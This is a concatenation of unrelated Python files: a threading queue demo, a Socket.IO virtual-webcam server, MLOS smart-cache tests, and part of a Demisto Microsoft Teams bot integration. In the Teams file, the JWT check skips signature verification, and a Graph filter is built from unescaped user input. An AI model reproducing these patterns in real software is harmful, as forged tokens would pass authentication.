time.sleep(0.5)
if __name__ == "__main__":
main()
|
demo9.py
|
from queue import Queue
import threading
import time
# q = Queue(4)  # maxsize=4 means the queue can hold at most 4 items
#
# for x in range(4):
# q.put(x)
#
# for x in range(4):
# print(q.get())
# print(q.qsize())
def set_value(q):
index = 0
while True:
q.put(index)
index += 1
time.sleep(1)
def get_value(q):
while True:
print(q.get())
def main():
q = Queue(4)
t1 = threading.Thread(target=set_value,args=[q])
t2 = threading.Thread(target=get_value,args=[q])
t1.start()
t2.start()
if __name__ == "__main__":
main()
|
SocketServer.py
|
import eventlet
from eventlet import wsgi, websocket
import socketio
from VirtualWebcam import VirtualWebcam
import subprocess as sp
from queue import Queue
from threading import Thread, Lock
import traceback
sio = socketio.Server()
app = socketio.WSGIApp(sio)
message_queue = Queue()
thread = None
lock = Lock()
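# Socket.IO events push settings changes onto message_queue; a single long-running
# VirtualWebcam thread (started on the first connect) consumes them.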
@sio.event
def connect(sid, environ):
print("-------------------CONNECT ", sid)
try:
global thread
global message_queue
if thread is None:
thread = Thread(target=long_running, args=(message_queue,))
thread.start()
return "OK", 123
except:
traceback.print_exc()
@sio.event
def setting_change(sid, data):
print(data)
if data.get("webcam"):
print("Setting changed", data.get("webcam"))
message_queue.put({"type": "webcam", "payload": data.get("webcam")})
elif data.get("accessibility"):
print("Setting changed", data.get("accessibility"))
message_queue.put(
{"type": "accessibility", "payload": data.get("accessibility")}
)
elif data.get("audio"):
print("Setting changed", data.get("audio"))
message_queue.put({"type": "audio", "payload": data.get("audio")})
else:
pass
# Add the data to Queue
return "OK", 123
@sio.event
def disconnect(sid):
print("disconnect ", sid)
print("ASDASDSD")
def long_running(message_queue):
t = VirtualWebcam(lock)
print("Starting up webcam")
t.start(message_queue)
if __name__ == "__main__":
eventlet.wsgi.server(eventlet.listen(("", 5000)), app)
|
TestE2EScenarios.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import logging
from threading import Thread
import time
from mlos.Logger import create_logger
from mlos.Examples.SmartCache import SmartCacheWorkloadGenerator, SmartCache
from mlos.Examples.SmartCache.TelemetryAggregators.WorkingSetSizeEstimator import WorkingSetSizeEstimator
from mlos.Mlos.Infrastructure import CommunicationChannel, SharedConfig
from mlos.Mlos.SDK import mlos_globals, MlosGlobalContext, MlosExperiment, MlosAgent
from mlos.Mlos.SDK.CommonAggregators.Timer import Timer
class TestE2EScenarios:
""" Tests aggregators based on the timer.
"""
@classmethod
def setup_class(cls) -> None:
mlos_globals.init_mlos_global_context()
cls.logger = create_logger('TestE2EScenarios')
cls.logger.level = logging.INFO
cls.mlos_agent = MlosAgent(
logger=cls.logger,
communication_channel=mlos_globals.mlos_global_context.communication_channel,
shared_config=mlos_globals.mlos_global_context.shared_config
)
cls.mlos_agent_thread = Thread(target=cls.mlos_agent.run)
cls.mlos_agent_thread.start()
mlos_globals.mlos_global_context.start_clock()
cls.mlos_agent.add_allowed_component_type(SmartCache)
cls.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
@classmethod
def teardown_class(cls) -> None:
cls.mlos_agent.stop_all()
mlos_globals.mlos_global_context.stop_clock()
def test_timer(self):
""" Tests if the timer works with required precision.
:return:
"""
timeout_ms = 100
epsilon_ms = 10
def _process_clock_event(elapsed_time_ms):
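# the timer must not fire more than epsilon_ms before the requested timeout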
assert elapsed_time_ms + epsilon_ms > timeout_ms
self.logger.debug(f"Processed clock event. Elapsed time: {elapsed_time_ms}")
timer = Timer(
timeout_ms=timeout_ms,
observer_callback=_process_clock_event,
epsilon_ms=epsilon_ms
)
timer_experiment = MlosExperiment(
smart_component_types=[],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(timer_experiment)
time.sleep(1)
self.mlos_agent.stop_experiment(timer_experiment)
def test_setting_random_configs_for_smart_cache_workload(self):
workload_duration_s = 1
# Let's launch the smart_cache_workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
def _set_random_workload_configuration(elapsed_time_ms):
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
def test_setting_random_configs_for_smart_cache(self):
workload_duration_s = 5
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
smart_cache_workload_thread.join()
self.mlos_agent.stop_experiment(smart_cache_experiment)
def test_setting_random_configs_for_smart_cache_and_for_smart_cache_workload(self):
""" Enables two experiments at once: one to set the cache parameters, the other to set the workload parameters.
:return:
"""
workload_duration_s = 2
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
##################################################################################
# Let's configure the experiment that changes the workload configuration
def _set_random_workload_configuration(elapsed_time_ms):
# First check that the config has been consumed
#if smart_cache_workload.current_config.values != self.current_workload_config_values:
# print("Put breakpoint here.")
#assert smart_cache_workload.current_config.values == self.current_workload_config_values
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
workload_timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[workload_timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
##################################################################################
# Now let's configure the smart cache tuning experiment
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(smart_cache_experiment)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
smart_cache_workload_thread.join()
all_registered_mlos_objects = set((component_type, runtime_attributes) for component_type, runtime_attributes in self.mlos_agent.enumerate_active_smart_components())
assert (
(smart_cache_workload.mlos_object.owning_component_type, smart_cache_workload.mlos_object.owning_component_runtime_attributes)
in all_registered_mlos_objects
)
del smart_cache_workload
self.mlos_agent.stop_all()
all_registered_mlos_objects = set(mlos_object for mlos_object in self.mlos_agent.enumerate_active_smart_components())
if len(all_registered_mlos_objects) != 0:
print("Put breakpoint here")
assert len(all_registered_mlos_objects) == 0
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
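# ENTITLEMENT_REGEX matches a GUID (8-4-4-4-12 hex digits), optionally wrapped in curly braces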
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
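# MENTION_REGEX matches mentions of the form "@<name>;" at the start of the message or after a space, e.g. "@Jane Doe; please review"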
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Unknown': 0,
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URL to markdown hyper-link
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
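# Illustrative sketch (not part of the integration): a minimal card with one text block
# and a single submit action could be built like this:
#   card = create_adaptive_card(
#       body=[{'type': 'TextBlock', 'text': 'Hello from the bot'}],
#       actions=[{'type': 'Action.Submit', 'title': 'Acknowledge', 'data': {'response': 'ack'}}]
#   )
# process_ask_user below composes its question cards in exactly this way.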
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph', params: Optional[Dict] = None
) -> Union[dict, list]:
"""A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
Args:
method (str): any restful method
url (str): URL to query
json_ (dict): HTTP JSON body
api (str): API to query (graph/bot)
params (dict): Object of key-value URL query parameters
Returns:
Union[dict, list]: The response in list or dict format.
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL,
params=params,
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results({
'ContentsFormat': formats['json'],
'Type': entryTypes['note'],
'HumanReadable': adi_health_human_readable + mirrored_channels_human_readable,
'Contents': adi_health_human_readable + mirrored_channels_human_readable
})
def validate_auth_header(headers: dict) -> bool:
"""
Validates the authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
schema: str = parts[0]
jwt_token: str = parts[1]
if schema != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
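# Note: this first decode intentionally skips signature verification; it is only used
# to read the issuer ('iss') claim before the signing key is looked up.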
decoded_payload: dict = jwt.decode(jwt=jwt_token, options={'verify_signature': False})
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = get_integration_context()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True,
'verify_signature': False,
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
set_integration_context(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = get_integration_context()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_user(user: str) -> list:
"""Retrieves the AAD ID of requested user
Args:
user (str): Display name/mail/UPN of user to get ID of.
Return:
list: List containing the requested user object
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
params = {
'$filter': f"displayName eq '{user}' or mail eq '{user}' or userPrincipalName eq '{user}'",
'$select': 'id'
}
users = cast(Dict[Any, Any], http_request('GET', url, params=params))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
Add user to channel (private channel only as still in beta mode)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user[0].get('id'))
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
